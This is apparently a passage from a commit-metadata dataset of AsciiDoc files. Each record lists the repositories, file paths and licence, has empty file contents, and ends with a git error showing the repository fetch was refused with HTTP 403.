footnotes\n","repos":"Peter32\/spring-security,mrkingybc\/spring-security,ajdinhedzic\/spring-security,mounb\/spring-security,chinazhaoht\/spring-security,spring-projects\/spring-security,pkdevbox\/spring-security,diegofernandes\/spring-security,vitorgv\/spring-security,fhanik\/spring-security,wkorando\/spring-security,follow99\/spring-security,adairtaosy\/spring-security,izeye\/spring-security,hippostar\/spring-security,jmnarloch\/spring-security,djechelon\/spring-security,mparaz\/spring-security,fhanik\/spring-security,raindev\/spring-security,panchenko\/spring-security,xingguang2013\/spring-security,Krasnyanskiy\/spring-security,rwinch\/spring-security,zhaoqin102\/spring-security,wilkinsona\/spring-security,likaiwalkman\/spring-security,panchenko\/spring-security,driftman\/spring-security,zshift\/spring-security,cyratech\/spring-security,wilkinsona\/spring-security,mparaz\/spring-security,yinhe402\/spring-security,rwinch\/spring-security,MatthiasWinzeler\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,hippostar\/spring-security,SanjayUser\/SpringSecurityPro,yinhe402\/spring-security,caiwenshu\/spring-security,tekul\/spring-security,MatthiasWinzeler\/spring-security,mounb\/spring-security,zshift\/spring-security,jmnarloch\/spring-security,xingguang2013\/spring-security,raindev\/spring-security,chinazhaoht\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,thomasdarimont\/spring-security,liuguohua\/spring-security,zhaoqin102\/spring-security,follow99\/spring-security,tekul\/spring-security,mrkingybc\/spring-security,ollie314\/spring-security,eddumelendez\/spring-security,ractive\/spring-security,hippostar\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,vitorgv\/spring-security,Xcorpio\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,wkorando\/spring-security,panchenko\/spring-security,zhaoqin102\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,follow99\/spring-security,likaiwalkman\/spring-security,izeye\/spring-security,xingguang2013\/spring-security,forestqqqq\/spring-security,pkdevbox\/spring-security,liuguohua\/spring-security,Xcorpio\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,ajdinhedzic\/spring-security,Peter32\/spring-security,adairtaosy\/spring-security,mdeinum\/spring-security,spring-projects\/spring-security,cyratech\/spring-security,izeye\/spring-security,fhanik\/spring-security,olezhuravlev\/spring-security,ajdinhedzic\/spring-security,ractive\/spring-security,jmnarloch\/spring-security,thomasdarimont\/spring-security,fhanik\/spring-security,adairtaosy\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,vitorgv\/spring-security,ollie314\/spring-security,wkorando\/spring-security,driftman\/spring-security,driftman\/spring-security,pkdevbox\/spring-security,cyratech\/spring-security,panchenko\/spring-security,Krasnyanskiy\/spring-security,spring-projects\/spring-security,Xcorpio\/spring-security,diegofernandes\/spring-security,pkdevbox\/spring-security,pwheel\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,zgscwjm\/spring-security,forestqqqq\/spring-security,adairtaosy\/spring-security,izeye\/spring-security,raindev\/spring-security,mrkingybc\/spring-security,caiwenshu\/spring-security,driftman\/spring-security,diegofernandes\/spring-security,zgscwjm\/spring-security,mo
unb\/spring-security,follow99\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,mounb\/spring-security,caiwenshu\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,wilkinsona\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,mrkingybc\/spring-security,ractive\/spring-security,rwinch\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,SanjayUser\/SpringSecurityPro,Krasnyanskiy\/spring-security,chinazhaoht\/spring-security,xingguang2013\/spring-security,wilkinsona\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,zshift\/spring-security,olezhuravlev\/spring-security,cyratech\/spring-security,tekul\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,zgscwjm\/spring-security,Peter32\/spring-security,likaiwalkman\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,tekul\/spring-security,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,thomasdarimont\/spring-security,caiwenshu\/spring-security,Peter32\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,mdeinum\/spring-security,vitorgv\/spring-security,fhanik\/spring-security,ractive\/spring-security,zhaoqin102\/spring-security,mparaz\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,chinazhaoht\/spring-security,spring-projects\/spring-security,raindev\/spring-security,jmnarloch\/spring-security,likaiwalkman\/spring-security,kazuki43zoo\/spring-security,Krasnyanskiy\/spring-security,spring-projects\/spring-security,hippostar\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aee113109eb646737f850280491c3d850d5d4171","subject":"Update 2015-10-30-Falcor.adoc","message":"Update 2015-10-30-Falcor.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-10-30-Falcor.adoc","new_file":"_posts\/2015-10-30-Falcor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4e488564750987d70a69c3f8ca2f2d011392c48","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d5159a7b0377dc538b591fc58134f14fab7ee60","subject":"Update 
2017-03-25-Treffen-am-24-Marz-2017.adoc","message":"Update 2017-03-25-Treffen-am-24-Marz-2017.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2017-03-25-Treffen-am-24-Marz-2017.adoc","new_file":"_posts\/2017-03-25-Treffen-am-24-Marz-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4848f1056adbebe32bc99a0319e37746afb1c0e","subject":"Revert \"Delete the file at '_posts\/2017-06-22-why_activation_function.adoc'\"","message":"Revert \"Delete the file at '_posts\/2017-06-22-why_activation_function.adoc'\"\n\nThis reverts commit 7a7f6d2b30f52702b13426fd2cf0daf6d8a659db.\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-22-why_activation_function.adoc","new_file":"_posts\/2017-06-22-why_activation_function.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2f6c0f3f6f68f1d0481783a08e0354c9a48c4ab","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80f1653fc9708272dc7904932388f6665b0fa492","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22c8cea1944a592b50e852df3daa2651bc970f4d","subject":"Tweak description for web fraction (#652)","message":"Tweak description for web fraction 
(#652)\n\n","repos":"wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm","old_file":"fractions\/javaee\/web\/README.adoc","new_file":"fractions\/javaee\/web\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"959d0123c34e193f1b8cc74ffdddf25663f19b83","subject":"y2b create post Madden 12 Hall Of Fame Edition Unboxing","message":"y2b create post Madden 12 Hall Of Fame Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-30-Madden-12-Hall-Of-Fame-Edition-Unboxing.adoc","new_file":"_posts\/2011-08-30-Madden-12-Hall-Of-Fame-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42ba6c4bc3fd122606358e8a4baa7b5e31b81e89","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cfc252c34125604ab7ae01503fdabe62c703da4","subject":"code of conduct","message":"code of conduct\n","repos":"trisberg\/jdbc,spring-cloud-stream-app-starters\/jdbc,trisberg\/jdbc","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trisberg\/jdbc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43bddc932af3f1d608acfa96744ff59080c27a66","subject":"added code of conduct stolen @spring","message":"added code of conduct stolen @spring\n","repos":"pivio\/pivio-client","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pivio\/pivio-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f5fc00012d337a115bbcf54254f06f9f9d0c875","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 
2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69aa1714a15481621481dc3d59992ffb75170be0","subject":"Update 2015-02-10-How-can-i-save.adoc","message":"Update 2015-02-10-How-can-i-save.adoc","repos":"sanglt\/sanglt.github.io,sanglt\/sanglt.github.io,sanglt\/sanglt.github.io","old_file":"_posts\/2015-02-10-How-can-i-save.adoc","new_file":"_posts\/2015-02-10-How-can-i-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sanglt\/sanglt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c42319c6f1a53eb6fbb2c8bcf2409ba19e15925","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e6eab343b1d30949730067627bba70f1d1e3473","subject":"y2b create post Unboxing Jack's New Laptop...","message":"y2b create post Unboxing Jack's New Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-04-Unboxing-Jacks-New-Laptop.adoc","new_file":"_posts\/2018-02-04-Unboxing-Jacks-New-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f52c560c49c7cd06b85698a6498947c5ab4be05a","subject":"README: typos fixed","message":"README: typos fixed","repos":"mikesir87\/arquillian-graphene,mikesir87\/arquillian-graphene,mikesir87\/arquillian-graphene,MatousJobanek\/arquillian-graphene,Vulcannis\/arquillian-graphene,MatousJobanek\/arquillian-graphene,Vulcannis\/arquillian-graphene,Vulcannis\/arquillian-graphene,mikesir87\/arquillian-graphene,rcormierastadia\/turnt-octo-cyril,rcormierastadia\/turnt-octo-cyril,MatousJobanek\/arquillian-graphene,rcormierastadia\/turnt-octo-cyril,MatousJobanek\/arquillian-graphene,Vulcannis\/arquillian-graphene","old_file":"extension\/screenshooter\/README.adoc","new_file":"extension\/screenshooter\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikesir87\/arquillian-graphene.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4cb0b38fa9e13b36573ece6b5db33d816abfd61","subject":"Update 2016-09-04-Hugo-No-Go.adoc","message":"Update 
2016-09-04-Hugo-No-Go.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-09-04-Hugo-No-Go.adoc","new_file":"_posts\/2016-09-04-Hugo-No-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65465f502507f1df3cd8e4c3d9f5892eecb6dd6a","subject":"CL: Files needed to add a private key to ssh-agent (edit)","message":"CL: Files needed to add a private key to ssh-agent (edit)\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3931668a7b7e5d0cc64d738015c87fe7d328c1fc","subject":"Update 2017-03-27-Short-Poem.adoc","message":"Update 2017-03-27-Short-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-27-Short-Poem.adoc","new_file":"_posts\/2017-03-27-Short-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f05a29597a3007a27ae46a8b0a08c956f4f76fd5","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82c9da08eae394d17fd3fe4ffe5c6a2cf2084a9a","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de96f7cd8a1def6c21e6c63bb41acae68fd11e9d","subject":"Add new notes in asciidoc","message":"Add new notes in asciidoc","repos":"Bigomby\/practicas-comdig","old_file":"practica02\/notes.adoc","new_file":"practica02\/notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bigomby\/practicas-comdig.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"62a093e3e2ecdc0608c91d2ac0011313b091ecd9","subject":"header","message":"header","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cf2b85f56932eb6a88e3d510c92bde8659d6d0c","subject":"Update 2016-08-22-Preserving-Content.adoc","message":"Update 2016-08-22-Preserving-Content.adoc","repos":"tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io","old_file":"_posts\/2016-08-22-Preserving-Content.adoc","new_file":"_posts\/2016-08-22-Preserving-Content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/tedbergeron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8b11780201aa6005988e59557b6e506fa29f454","subject":"Add file for documenting Unicode generated test files","message":"Add file for documenting Unicode generated test files\n\nContains information like:\n* List of Perl6 script used to update the tests\n* Roast Test File's generated\n* Version number the test was generated from\n* Date we last generated the file\n* File header of the test file, in case Unicode updates their test files\n (Unicode's files are all dated).\n","repos":"perl6\/roast,dogbert17\/roast,bitrauser\/roast,dogbert17\/roast,bitrauser\/roast","old_file":"docs\/unicode-generated-tests.asciidoc","new_file":"docs\/unicode-generated-tests.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dogbert17\/roast.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"70c2992bfa6658636939d4952794de882eff1037","subject":"[docs] KUDU-2395 Add nscd to requirements","message":"[docs] KUDU-2395 Add nscd to requirements\n\nChange-Id: Iad4db28297c08739b048dc46e398f7ddca80df48\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/13084\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4cc274a81a79d46b6dc6d380fdb0459d23eb65e","subject":"Fix problem with numbered list in \"Build from Source\" instructions","message":"Fix problem with numbered list in \"Build from Source\" instructions\n\nChange-Id: I38ffd16cbfc2f99d955ea2c5ab9efdc84ad034c8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1065\nTested-by: Misty Stanley-Jones 
<b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c075a902755abdae549fdd659e3ce431833646cd","subject":"Update 2015-10-16-Crimson-Peak.adoc","message":"Update 2015-10-16-Crimson-Peak.adoc","repos":"heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io","old_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heartnn\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd6950c5b9f9313001dafe4911c537797d1f5bcf","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b19e488cd36bfe3b44e22126863c532051732a92","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55d2faed94077ced16b736ca5e499022b0aa4789","subject":"[docs] Adjust latency and bandwidth limitations","message":"[docs] Adjust latency and bandwidth limitations\n\nAdjusts the documentation for latency and bandwidth\nlimitations to be a bit more conservative. 
Additionally,\nremoves any reference to DC\/AZ deployments given\nwe are primarily concerned about latency and bandwidth\nas the concrete limitations.\n\nChange-Id: I42fe8a65779c3f5ad366403366e534fa28713a76\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12970\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40483648f5aa2cb5907ad1434fe19ceef6e79673","subject":"update structure + add uuid examples","message":"update structure + add uuid examples\n","repos":"adoc-editor\/editor-backend","old_file":"doc\/json\/datas-structure.adoc","new_file":"doc\/json\/datas-structure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5731bc2f81215c2c1dbdb8269285ca3edbfcea34","subject":"Update 2015-10-27-north_india_trip_delhi_crime_capital.adoc","message":"Update 2015-10-27-north_india_trip_delhi_crime_capital.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-27-north_india_trip_delhi_crime_capital.adoc","new_file":"_posts\/2015-10-27-north_india_trip_delhi_crime_capital.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f960f5f7a810620303ff182e894d5d1b00f3e0c7","subject":"Python note: Using Python Anaconda distribution as a virtual environment","message":"Python note: Using Python Anaconda distribution as a virtual environment\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 